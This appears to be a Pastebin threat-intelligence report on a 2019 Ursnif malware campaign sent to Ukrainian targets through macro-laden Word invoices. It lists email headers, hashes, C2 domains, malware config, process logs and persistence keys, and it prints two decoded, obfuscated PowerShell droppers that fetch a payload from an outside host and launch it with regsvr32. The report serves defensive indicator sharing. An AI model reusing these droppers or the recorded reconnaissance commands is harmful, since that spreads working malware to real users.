Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #emotet_doc #ursnif_payload #W97M #PowerShell #ENC #inject
- https://pastebin.com/1XfkVE5e
- previous_contact: n/a
- FAQ: https://radetskiy.wordpress.com/2018/04/03/ioc_ursnif_020418/
- attack_vector
- --------------
- email attach .DOC > macro > b64 > powershell > GET bin > %user%\*.bin > %user%\appdata\roaming\microsoft\audizfwk\adsnwave.dll
- email_headers
- --------------
- #1
- Return-Path: <noreply@princefinance.princefamily33.com>
- Received: from gateway36.websitewelcome.com (gateway36.websitewelcome.com [192.185.201.2])
- Received: from cm14.websitewelcome.com (cm14.websitewelcome.com [100.42.49.7])
- Received: from box5254.bluehost.com ([162.241.225.96])
- Received: from [89.253.149.192] (port=53724 helo=5.61.57.146)
- Subject: терміново
- From: "Tetyana.Olekseevna@monolit.dn.ua" <noreply@princefinance.princefamily33.com>
- Date: Thu, 17 Oct 2019 16:35:57 +0300
- X-Source-IP: 89.253.149.192
- X-Source-Sender: (5.61.57.146) [89.253.149.192]:53724
- X-Source-Auth: noreply@princefinance.princefamily33.com
- #2
- Return-Path: <christina@princeonlinewebdesign.com>
- Received: from gateway22.websitewelcome.com (gateway22.websitewelcome.com [192.185.46.142])
- Received: from cm16.websitewelcome.com (cm16.websitewelcome.com [100.42.49.19])
- Received: from box5254.bluehost.com ([162.241.225.96])
- Received: from [178.75.241.39] (port=9647 helo=5.61.57.146)
- Date: Thu, 17 Oct 2019 16:35:57 +0300
- From: "Zoryana.Volodimirovna@topyachts.com.ua" <christina@princeonlinewebdesign.com>
- Subject: Рахунок-Фактура №340
- X-Source-IP: 178.75.241.39
- X-Source-Sender: (5.61.57.146) [178.75.241.39]:9647
- X-Source-Auth: christina@princeonlinewebdesign.com
- #3
- Return-Path: <betty@upstatehealthcareservices.com>
- Received: from gproxy6-pub.mail.unifiedlayer.com (outbound-ss-348.hostmonster.com [74.220.202.212])
- Received: from cmgw15.unifiedlayer.com (unknown [10.9.0.15])
- Received: from box787.bluehost.com ([66.147.244.87])
- Received: from [62.176.68.133] (port=61085 helo=5.61.57.146)
- From: "Ivan.Volodimirovich@scalehobby.com.ua" <betty@upstatehealthcareservices.com>
- Date: Thu, 17 Oct 2019 16:22:40 +0300
- Subject: Рахунок за Газ №9282
- X-Source-IP: 62.176.68.133
- X-Source-Sender: (5.61.57.146) [62.176.68.133]:61085
- X-Source-Auth: betty@upstatehealthcareservices.com
- files
- --------------
- SHA-256 f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287
- File name rahunok#0027980.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
- File size 285 KB (291840 bytes)
- SHA-256 3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087
- File name rahunok#0037239.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
- File size 329.5 KB (337408 bytes)
- SHA-256 e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b
- File name hfsjaoipqewfbwoei.bin (point.dll) [PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit]
- File size 1.1 MB (1150976 bytes)
- activity
- **************
- PL_SCR 161.117.39.210 limitsno{.} at/hfsjaoipqewfbwoei.bin
- C2 47.74.186.51 vip-statistic{.} at
- + @bomccss
- #ursnif config
- serpent_key: Dfei8OoQ0xhjTyql
- botnet-id: 700
- version: 217027
- c2:
- cxzko43pnr7ujnte[.]onion
- vip-statistic[.]at
- intrade-support[.]at
- fresh-girls[.]at
- netwrk
- --------------
- [ssl]
- 216.58.201.78 google.com Client Hello
- [http]
- 47.74.186.51 limitsno{.} at GET /hfsjaoipqewfbwoei.bin HTTP/1.1 noUA
- 47.74.186.51 vip-statistic{.} at GET /images/NFVfNmnFntzllAW_2/..../P1.gif HTTP/1.1 Mozilla/4.0
- 47.74.186.51 vip-statistic{.} at POST /images/ZP9eBpRUFTo1VIxz/.../C.bmp HTTP/1.1 Mozilla/4.0
- comp
- --------------
- powershell.exe 2832 TCP localhost 49168 47.74.186.51 80 ESTABLISHED
- explorer.exe 1988 TCP localhost 49169 216.58.201.78 443 ESTABLISHED
- explorer.exe 1988 TCP localhost 49170 216.58.201.68 443 ESTABLISHED
- explorer.exe 1988 TCP localhost 49171 47.74.186.51 80 ESTABLISHED
- explorer.exe 1988 TCP localhost 49172 5.61.57.146 80 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enco (base64)
- "C:\Windows\system32\regsvr32.exe" /s C:\Users\operator\nKUXcZ.bin
- C:\Windows\system32\control.exe /?
- "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL /?
- C:\Windows\system32\cmd.exe
- cmd.exe /C "nslookup myip.opendns.com resolver1.opendns.com > C:\tmp\415B.bi1"
- cmd /C "echo -------- >> C:\tmp\415B.bi1"
- "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
- cmd /C "systeminfo.exe > C:\tmp\A13.bin1"
- C:\Windows\system32\systeminfo.exe
- cmd /C "net view >> C:\tmp\A13.bin1"
- C:\Windows\system32\net.exe net view
- cmd /C "nslookup 127.0.0.1 >> C:\tmp\A13.bin1"
- cmd /C "tasklist.exe /SVC >> C:\tmp\A13.bin1"
- cmd /C "driverquery.exe >> C:\tmp\A13.bin1"
- cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\tmp\A13.bin1"
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2019 14:07
- crypssec Free Age SportsSignup Meat
- c:\users\operator\appdata\roaming\microsoft\audizfwk\adsnwave.dll 06.10.2019 13:51
- @rundll32 "C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll",DllRegisterServer
- drop
- --------------
- C:\Users\operator\nKUXcZ.bin
- C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll
- C:\tmp\A13.bin1 - zip _ extracted info !!!
- C:\tmp\415B.bi1 - zip _ extracted info !!!
- C:\tmp\D5D9.bin - zip _ extracted info !!!
- C:\tmp\422B.bin - zip _ extracted info !!!
- C:\tmp\2BF9.bin - zip _ extracted info !!!
- C:\tmp\4DC3.bin - zip _ extracted info !!!
- C:\tmp\3083.bin - zip _ extracted info !!!
- decoded b642powershell
- --------------
- #1
- $yozninjdjc="wxvhw";
- $kjqpsfw = "nKUXcZ";
- $kyvisokdvpou="iisvbivwcdfv";
- $bduhtq=$env:userprofile+"\"+$kjqpsfw+".bin";
- $shofvhgo="hfaho";
- $rwwci=&("new-object") net.webclient;
- $mznbayyscbf="clmvzpwymfxtqyuuq";
- $mtfyqp="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
- $hxpdmkdtmrg="kclcrunb";
- Function dwnld{
- $ndrrgwesufj="bqdtsgtsy";
- try{
- $ubjlvybhksmvmqz="svebvywesqwpbtt";
- $rwwci."DownloadFile"($mtfyqp, $bduhtq);
- $nosvyxzfejquwqm="jaqaiyxlv";
- If ((.("Get-Item") $bduhtq)."length" -ge 200000) {
- $pnpeirog="kmcyuo";
- $ugvjgt = Start-Process -FilePath "regsvr32.exe" -Args "/s $bduhtq" -Wait -NoNewWindow -PassThru;
- $ksecir="jvnvnwurbfdxqygqf";
- } else {
- $mhmwvmqfuybxwur="drffczm";
- dwnld;
- $pemmvoigqmsza="jyeqziuppapb";
- }
- $cqhccbph="gvuz";
- }catch{
- $rcvwrhfjqqxxch="mqeezcoacfemgpkzkd";
- dwnld;
- $vwdggtfwd="ovjvyghtjfxrnktgt";
- }}dwnld;
- $zbadv="vccbbnzdpdyqgcv";
- #2
- $zhsiziqtdjjsyfye="nxoyyqtocw";
- $mgvtio = "UJqEF";
- $ithgawkqu="wgpqgqgnhjruhliad";
- $yueeoa=$env:userprofile+"\"+$mgvtio+".bin";
- $izbblp="zlzhdcptbhaunoglez";
- $ngvqvqb=&("new-object") net.webclient;
- $kltkpujnqzfofb="dzygqluhywhhvtx";
- $nslldzj="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
- $rbntzlbqkulv="vvrfbdvtoo";
- Function dwnld{
- $lazaxcmudbef="wzgiffoctszol";
- try{
- $wrqkxxidhtjrrcq="bviazvtzbmwpoiz";
- $ngvqvqb."DownloadFile"($nslldzj, $yueeoa);
- $wurllwckcoaobk="cwnwbf";
- If ((.("Get-Item") $yueeoa)."length" -ge 200000) {
- $quyqejvsjujj="mzoffmbtc";
- $jdjpil = Start-Process -FilePath "regsvr32.exe" -Args "/s $yueeoa" -Wait -NoNewWindow -PassThru;
- $gzvivurflv="koherilwrbkvczpi";
- } else {
- $ypcmgzp="zkupghelnqeegzm";
- dwnld;
- $zgxifpixbe="bwoffieyelusq";
- }
- $jbialh="huodfndgmg";
- }catch{
- $yjkwithuhhapy="ilcdki";
- dwnld;
- $xlgnju="gpstdwckvbm";
- }}dwnld;
- $gxpfk="ehxqxmwggmw";
- # # #
- https://www.virustotal.com/gui/file/f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287/details
- https://www.virustotal.com/gui/file/3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087/details
- https://www.virustotal.com/gui/file/e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b/details
- https://analyze.intezer.com/#/analyses/4db134a6-ebba-4515-bb5e-1b6ef9ac81f1
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement